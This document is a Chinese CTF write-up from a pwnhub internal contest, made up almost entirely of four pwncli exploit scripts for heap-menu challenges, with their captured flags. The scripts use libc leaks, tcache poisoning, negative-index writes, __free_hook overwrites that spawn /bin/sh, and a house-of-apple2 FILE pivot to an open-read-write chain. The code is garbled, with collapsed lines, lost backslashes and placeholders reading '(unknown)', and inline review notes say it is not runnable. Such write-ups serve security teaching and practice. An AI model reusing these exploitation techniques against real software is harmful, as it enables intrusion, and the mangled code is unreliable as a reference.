【pwn专场】pwnhub内部赛writeup

【pwn专场】pwnhub内部赛writeup






sh_v1.1_exp_cli.py



#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port
# flag{love-life-love-freedom-d23s}
# Harness setup: pwncli's cli_script() parses the debug/remote arguments described in
# the usage header and fills `gift` with the tube, the target ELF and the libc handle.
# NOTE(review): extraction collapsed this file's newlines (e.g. `import *cli_script()`
# and `gift.ioelf:` sharing a line), so the listing is not runnable as shown.
# The docstring that follows is the author's summary of the challenge binary's file
# commands: the status/filename layout and which operations allocate, copy, free or
# reuse a slot.
from pwncli import *cli_script()
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
"""0: status8: filename
------------
ls file: status == 1: print
cat file: status == 1: puts filecontent
touch file: status == 0: status = 1 filecontent = malloc(0x208) strcpy(filename, xxx) read()
cp file1 file2: file1 == file[0].filename: fine file2: strncpy(file2, file[0], 0x208) else: find files[n].status == 0 files[n].status = 1 files[n].filename = file2 strncpy(file2, file[0], 0x208)
gedit file: find filename file.status == 1: read(filecontent, 0x200)
rm file: free(files[n]) files[n] = 0
ln target linkname: find file: find status==0: strcpy(filename, linkname) status = 1 linkname = target.content
"""
# Send one menu command after the ">>>>" prompt has arrived (sla = sendlineafter).
def cmd(i): sla(">>>>", i)
# Menu wrappers for `touch` and `gedit`: issue the command, then send the file content
# (s = send); with sendline=True a trailing newline is sent as well.
# NOTE(review): two defs share this line because extraction dropped the newlines, and the
# f-string argument now reads "(unknown)" — presumably the filename placeholder was lost
# in extraction, so this line is not runnable as shown.
def touch(filename, data="deadbeef", sendline=True): cmd(f'touch (unknown)') print(" ") s(data) if sendline: s("n") def gedit(filename, data, sendline=True): cmd(f'gedit (unknown)') print(" ") s(data) if sendline: s("n")
# Menu wrapper for `cat`; the filename placeholder in the f-string appears to have been
# lost in extraction ("(unknown)").
def cat(filename): cmd(f'cat (unknown)')
# Menu wrapper for `rm`; the filename placeholder in the f-string appears to have been
# lost in extraction ("(unknown)").
def rm(filename): cmd(f'rm (unknown)')
# Menu wrapper for `ln target linkname`.
def ln(target, linkname): cmd(f'ln {target} {linkname}')
# Published exploit sequence for sh_v1.1, kept exactly as extracted.
# NOTE(review): extraction collapsed several statements onto single lines and mangled
# escape sequences (e.g. "x00"), so this records the author's interaction order rather
# than being a runnable script.
# As far as the visible calls show: eight files and a link to file0 are created, all are
# removed, and `cat link0` yields a libc address that set_current_libc_base_and_log
# resolves against offset 0x1ebb80; the second half writes libc.sym.__free_hook - 8 via
# the link and then frees a file to trigger it.
# Note: __free_hook and the other malloc hooks were removed in glibc 2.34, so this last
# stage only applies to the older libc this challenge ships with.
for i in range(8): touch(f"file{i}")
ln("file0", "link0")
for i in range(7): rm(f"file{i+1}")
rm("file0")
cat("link0")
main_arena_addr = recv_current_libc_addr() - 96leak("main_arena_addr", main_arena_addr)S()lb = set_current_libc_base_and_log(main_arena_addr, 0x1ebb80)
for i in range(8): touch(f"file{i}") rm("file6")rm("file7")gedit("link0", p64(libc.sym.__free_hook-8))S()touch(f"file8")touch(f"file9", flat("/bin/shx00", libc.sym.system))rm("file9")
ia()

three_edit_exp_cli.py


# Harness setup for three_edit.
# NOTE(review): during extraction the shebang line absorbed the usage header, the flag
# comment, the pwncli import, cli_script() and set_remote_libc('libc-2.31.so'); as shown
# the whole first line is one comment, so the listing is not runnable as-is.
#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port# flag{12awxvpjsd-21aqxw-a3daxdlpsd-987@376hnb}from pwncli import *cli_script()set_remote_libc('libc-2.31.so')
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
def cmd(i): sla("is:", i)
# Menu option 1: allocate slot i with size sz and send its content; sendline chooses
# between sendlineafter and sendafter for the content prompt.
# NOTE(review): the body was collapsed onto the def line by extraction.
def add(i, sz, data="deadbeef", sendline=True): cmd('1') sla("index:n", str(i)) sla("size:n", str(sz)) if sendline: sla("content:n", data) else: sa("content:n", data)
# Menu option 2: free slot i.
def dele(i): cmd('2') sla("index?n", str(i))
# Menu option 3: overwrite the content of slot i. The two branches wait on different
# prompt strings ("content:" vs "new content:") as written.
def edit(i, data, sendline=True): cmd('3') sla("index?n", str(i)) if sendline: sla("content:n", data) else: sa("new content:n", data)

# Published exploit sequence for three_edit, kept as extracted (statements collapsed onto
# shared lines; escape sequences such as "xf0"/"x00" lost their backslashes), so this is
# a record of the interaction order, not a runnable script.
# The negative indices passed to edit(-0x3e, ...) and edit(-0x3c, ...) suggest the binary
# does not bounds-check the slot index. The leak stage targets _IO_2_1_stdout_ (the
# 0x46a0 value is used only on the remote path and is challenge-specific); the final
# stage writes libc.sym.__free_hook - 8 and triggers it with dele(4).
# Note: the malloc hooks were removed in glibc 2.34; set_remote_libc pins 2.31 here.
add(0, 0x51, flat({0x40: [0, 0x71]}))add(1, 0x50)add(2, 0x50)
for i in range(9): add(i+3, 0x70)
# add(12, 0x50)
dele(0)dele(2)S(0)edit(-0x3e, "xf0")
for i in range(7): dele(9 - i)
S(0)add(3, 0x50)add(4, 0x50, flat(0, 0x441))S(0)dele(1)S(0)
add(0, 0x50)add(1, 0x50)
if gift.remote: off = 0x46a0else: off = (gift._libc_base + libc.sym._IO_2_1_stdout_) & 0xffffS()edit(-0x3c, p16(off))S()add(5, 0x70)S()add(6, 0x70, flat(0xfbad1887, 0, 0, 0, "x00"))
libcaddr = recv_current_libc_addr()leak("libcaddr", libcaddr)
set_current_libc_base_and_log(libcaddr, 0x1eb980)dele(1)dele(0)dele(4)
add(0, 0x60, flat(0, 0x61, libc.sym.__free_hook-8))add(1, 0x50)add(4, 0x50, flat("/bin/shx00", libc.sym.system))dele(4)
ia()

tototo_exp_cli.py


#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port# flag{1sddeasd-2axxxedw-a3dd23fdasd-a346gasdw}
# Harness setup for tototo: pwncli argument parsing, libc pinned to libc-2.31.so, and the
# gadget finder restricted to libc (find_in_libc=1) for the CurrentGadgets calls below.
# NOTE(review): extraction fused statements onto single lines (import + cli_script() +
# set_remote_libc; the set_find_area call sits inside a commented line), so as shown the
# listing is not runnable.
from pwncli import *cli_script()set_remote_libc('libc-2.31.so')
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)CurrentGadgets.set_find_area(find_in_elf=0, find_in_libc=1, do_initial=False)
def cmd(i): sla("is:", i)
# Menu option 1: allocate slot i with size sz; the author's note gives the accepted size
# range as 0x200-0x800. NOTE(review): the body was pulled onto the def line behind the
# `#` by extraction, so syntactically this def has no body as shown.
def add(i, sz): # 0x200-0x800 cmd('1') sla("index?n", str(i)) sla("size?n", str(sz))
# Menu option 5: a second allocation path with the same index/size prompts as add();
# same extraction caveat as add() (body sits behind the `#`).
def add2(i, sz): # 0x200-0x800 cmd('5') sla("index?n", str(i)) sla("size?n", str(sz))
# Menu option 3: overwrite slot i's content; sendline selects sendlineafter vs sendafter.
def edit(i, data, sendline=True): cmd('3') sla("Which one?n", str(i)) if sendline: sla("new content?n", data) else: sa("new content?n", data)
# Menu option 4: print slot i's content (used below to read back freed-chunk metadata).
def show(i): cmd('4') sla("Which one?n", str(i))

# Menu option 2: free slot i.
def dele(i): cmd('2') sla("Which one?n", str(i))
# Published exploit sequence for tototo, kept as extracted (statements collapsed onto
# shared lines; "x00" has lost its backslash), so this documents the interaction order
# rather than being runnable.
# show() on freed slots 1 and 2 yields a heap and a libc address (u64_ex(rn(6))); the
# libc base is resolved against offset 0x1ebbe0. The payload is built with pwncli's
# IO_FILE_plus_struct helper (house_of_apple2_stack_pivoting_when_do_IO_operation) using
# _IO_list_all / _IO_wfile_jumps from the pinned libc-2.31.so, and an orw_chain that
# reads "flag.txt"; `cmd('3')` at the end is annotated by the author as the exit path
# that performs the IO operation.
add(2, 0x420)add(0, 0x200)add(1, 0x200)add(7, 0x800)dele(7)add(8, 0x200)add(3, 0x410)add(4, 0x200)
dele(0)dele(1)show(1)
heapaddr = u64_ex(rn(6))leak("heapaddr", heapaddr)
dele(2)show(2)libcaddr = u64_ex(rn(6))leak("libcaddr", libcaddr)
lb = set_current_libc_base_and_log(libcaddr, 0x1ebbe0)add(5, 0x600)
edit(2, flat(lb + 0x1ebfd0, 0, libc.sym._IO_list_all-0x20)[1:])
dele(3)add(6, 0x600)
fff = IO_FILE_plus_struct()
payload = fff.house_of_apple2_stack_pivoting_when_do_IO_operation(standard_FILE_addr=heapaddr+0x620, _IO_wfile_jumps_addr=libc.sym._IO_wfile_jumps, leave_ret_addr=CurrentGadgets.leave_ret(), pop_rbp_addr=CurrentGadgets.pop_rbp_ret(), fake_rbp_addr=heapaddr+0x430+0x8 )
edit(7, flat({0x200-9: payload, 0x7:[ "flag.txt".ljust(0x10, "x00"), CurrentGadgets.orw_chain(heapaddr+0x430, heapaddr)]}, filler="x00"))
edit(4, "x00")
cmd('3') # exit 0
ia()

ttsc_exp_cli.py


#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port# flag{12sd22222s-213edw-a3aaazcd-ad213dasd2sdw}
# Harness setup for ttsc: pwncli argument parsing with libc pinned to libc-2.27.so.
# NOTE(review): extraction fused the import, cli_script() and set_remote_libc onto one
# line, so as shown the listing is not runnable.
from pwncli import *cli_script()set_remote_libc('libc-2.27.so')
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
def cmd(i): sla("chs:", i)
def add(i, sz, data="deadbeef"): cmd('1') sla("index?n", str(i)) sla("size:n", str(sz)) sleep(0.1) s(data)
# Menu option 2: free slot i.
def dele(i): cmd('2') sla("index?n", str(i))
# Menu option 3: overwrite slot i's content; sa (sendafter) does not append a newline,
# which is why callers below append "n" themselves.
def edit(i, data): cmd('3') sla("index?n", str(i)) sa("content:", data)

sa("what is your name?n", "roderick"*2)sla("age?n", str(18))sla("high?n", str(18))
stackleak = recv_current_libc_addr()leak("stack address", stackleak)
# 1. 记录你现在掌握的信息,漏洞、读写能力;你发现无法进行下一步利用,大概率你还有漏洞没找到# 2. 写下你的利用过程,从读到写
# 通过栈,分配到stdout
# array size: 4add(0, 0x18)add(1, 0x28)add(2, 0x78, flat(0, 0, 0, 0x21))add(3, 0x78) # tcache_count
edit(0, flat({0x18: "x51"}))dele(1)dele(3)dele(2)add(1, 0x40, flat({0x20: [0, 0x31, stackleak-0x28b8]}))S(0)add(2, 0x78)add(3, 0x78)S(0)dele(0)add(0, 0x78, flat(0xfbad1887, 0, 0, 0, "x00"))libcaddr = recv_current_libc_addr()leak("libcaddr", libcaddr)lb = set_current_libc_base_and_log(libcaddr, 0x3ed8b0)S(0)
edit(0, flat(0xfbad1887, 0, 0, 0, libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131+1, 0, 0, 0, 0, 0, 2, "n"))
leakaddr = stackleak+0x20
# tcache->key = 0edit(0, flat(0xfbad1887, leakaddr, leakaddr, leakaddr, leakaddr, leakaddr+8, leakaddr+8, leakaddr, libc.sym._IO_2_1_stdout_+131+8, 0, 0, 0, 0, 0, 2, "n"))
codeaddr = u64(rn(8))leak("codeaddr", codeaddr)codebase = codeaddr-0x1080
dele(2)edit(1, flat({0x30: codebase+0x202080}) + b"n")dele(1)add(1, 0x20)add(2, 0x20, p64(libc.sym.__free_hook-8))edit(0, flat("/bin/shx00", libc.sym.system, "n"))dele(0)
sl("cat flag* >&2")
ia()

题目附件下载地址请后台回复:pwnhub03internal



原文始发于微信公众号(Arr3stY0u):【pwn专场】pwnhub内部赛writeup

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。